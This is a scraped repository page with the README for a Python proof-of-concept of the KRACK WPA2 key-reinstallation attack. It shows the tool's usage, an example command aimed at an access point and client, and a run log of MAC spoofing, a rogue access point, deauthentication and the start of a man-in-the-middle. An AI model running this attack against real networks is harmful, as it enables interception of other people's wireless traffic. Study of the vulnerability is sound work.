项目作者: Hackndo

项目描述 :
Krack POC
高级语言: Python
项目地址: git://github.com/Hackndo/krack-poc.git
创建时间: 2017-11-03T12:39:01Z



[NO SUPPORT] PoC Krack (Key Reinstallation AttaCKs)

PLEASE READ : I have no intention to update or maintain this code. Feel free to use and modify it, but I won’t answer to any comment/issue anymore. This project was difficult, I learnt what I wanted to learn, and developed what I wanted to develop, a quick-one-win to validate my comprehension of the vulnerability.

Proof of concept for Krack attack using channel-based MitM


French article on hackndo


WPA2 with CCMP


  1. # ./Krack.py -h
  2. usage: Krack.py [-h] [-d] -a ACCESS_POINT -i IFACE_AP -b CLIENT -j
  4. optional arguments:
  5. -h, --help show this help message and exit
  6. -d, --direct Skip channel and monitor settings
  7. -a ACCESS_POINT, --access_point ACCESS_POINT
  8. Enter the SSID of the specific access point to target
  9. -i IFACE_AP, --iface_ap IFACE_AP
  10. Enter the SSID of the specific access point to target
  11. -b CLIENT, --client CLIENT
  12. Enter the MAC address of the specific client to target
  13. -j IFACE_CLIENT, --iface_client IFACE_CLIENT
  14. Enter the SSID of the specific access point to target
  15. -c CHANNEL, --channel CHANNEL
  16. Choose channel on which the targeted access point is
  17. listening on
  18. # ./Krack.py -a hackndo_ssid_test -i wlan1 -b "ab:cd:0a:0b:11:22" -j wlan0 -c 11
  19. [*] Turning off both interfaces
  20. [*] Setting interface wlan1 on channel 11
  21. [*] Interface wlan1 is on channel 11
  22. [*] Setting interface wlan0 on channel 4
  23. [*] Interface wlan0 is on channel 4
  24. [*] Starting monitor mode for wlan1
  25. [*] Interface wlan1 is now in monitor mode
  26. [*] Starting monitor mode for wlan0
  27. [*] Interface wlan0 is now in monitor mode
  28. [*] Turning on both interfaces
  29. [*] Trying to find hackndo_ssid_test MAC address
  30. [*] MAC Found ! 0e:cc:46:8a:b1:09
  31. [*] Jammer initialized correctly
  32. [*] Sniffing an AP Beacon...
  33. [*] AP Beacon saved!
  34. [*] Sniffing an AP Probe response...
  35. [*] AP Probe response saved!
  36. [*] Updating wlan1 MAC address to ab:cd:0a:0b:11:22 (Client MAC)
  37. [*] wlan1 MAC address update successful
  38. [*] Updating wlan0 MAC address to 0e:cc:46:8a:b1:09 (Real AP MAC)
  39. [*] wlan0 MAC address update successful
  40. [*] Rogue AP started. Sending beacons...
  41. [*] Running main loop
  42. [*] Starting deauth on AP 0e:cc:46:8a:b1:09 (hackndo_ssid_test) and client ab:cd:0a:0b:11:22...
  43. [*] Probe request to our AP
  44. [*] Client authenticated to our AP!
  45. [*] MitM attack has started
  46. [*] Deauth stopped


  • [X] Use CSA (Channel Switch Announcement) to make client switch channel after deauth (See issue #1)
  • Save data sent by client
  • Break cryptography with known plain text when counter is reinitialized